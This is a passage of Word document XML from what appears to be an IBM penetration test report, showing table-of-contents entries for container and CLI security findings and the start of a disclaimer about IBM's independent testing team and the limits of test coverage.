        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562843 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12F8EEEC" w14:textId="719D1C49" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562844" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>194312: Restrict Container From Acquiring Additional Privileges (No-New-Privileges)</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_Toc200562844 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="72F28808" w14:textId="16061C71" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562845" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>194317: Missing Seccomp profile</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_Toc200562845 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>24</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D5992DD" w14:textId="0FE6DA7F" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562846" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>194313: Container's Root Filesystem Has Read-Write Permission</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_Toc200562846 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>25</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50642125" w14:textId="3FF62B4C" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562847" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>194316: Containers With No CPU/Memory Limitations</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_Toc200562847 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>26</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C5861C2" w14:textId="177C93E4" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562848" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>194315: Running SSH Inside Containers</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_Toc200562848 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="55AB16BB" w14:textId="0888DA92" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562849" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>CLI Security Vulnerability</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562849 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F93FA2C" w14:textId="793EBC71" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562850" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>195190: Container To Host Escape Via RCE And SSH Credentials  </w:t>
        </w:r>
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:i/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> (Critical)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562850 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>29</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0AF13597" w14:textId="2F1ECB89" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562851" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>195172: Hardcoded Credentials</w:t>
        </w:r>
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:i/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> (Medium)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562851 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>36</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="62A19FE5" w14:textId="17587925" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562852" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>195165: Unsigned Executable File</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_Toc200562852 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>38</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6D7FFD50" w14:textId="140CC1D2" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562853" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>195171: Sensitive Information Passed In CLI Arguments</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_Toc200562853 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>39</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6225E032" w14:textId="31154D7F" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562854" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>195199: Password Returned In Response</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_Toc200562854 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>41</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6216BB00" w14:textId="65135945" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC4"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562855" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>195164: No Binary Obfuscation</w:t>
        </w:r>
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:i/>
            <w:noProof/>
          </w:rPr>
          <w:t xml:space="preserve"> (Informational)</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562855 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D10CADD" w14:textId="72D24239" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562856" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Appendix A - Detailed Testing Methodology</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562856 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28434E4A" w14:textId="415212CB" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562857" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Appendix B - Tools and Utilities</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562857 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="391F23BB" w14:textId="335AF01B" w:rsidR="00F73A60" w:rsidRDefault="00F73A60">
      <w:pPr>
        <w:pStyle w:val="TOC3"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc200562858" w:history="1">
        <w:r w:rsidRPr="002B2C10">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Appendix C</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc200562858 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7E86EF2C" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="19925BD4" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED99CC6" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc200562818"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Disclaimer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1D6019B8" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Penetration Testing Teams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC76DC1" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Depending on the offering and scenario, IBM teams engage penetration testing teams from many different approved sources, including independent teams from within IBM such as IBM's Product-Security Technology Centre (PTC). The IBM PTC is an independent team within IBM, and is independent of product/offering teams, having no role in the design, architecture, development, testing and delivery of products and offerings. Following Separation of Duties (SOD) practices, the IBM PTC team will remain independent of the "being-tested" team, to ensure high quality, unbiased and independent penetration testing for offerings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCA4AA6" w14:textId="2FA5CF3F" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">In this respect IBM follows the PCI Security Standards Council Guideline as described in Section 3, Information Supplement, Penetration Testing Guidance, September 2017: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00591E54" w:rsidRPr="00851478">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          </w:rPr>
          <w:t>https://www.pcisecuritystandards.org/documents/Penetration-Testing-Guidance-v1_1.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2E9E8B5C" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13552616" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Penetration Testing Coverage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A2CF6B" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The penetration test results are related to the specific, performed, tests only. They indicate, but do not and cannot measure, the entire security posture (quality of protections) of an application and/or its systems and network, including as deployed in the context of a client’s environment for client-controlled products and offerings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FC02E7" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43083940" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc200562819"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>IBM Confidential</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="2D892438" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
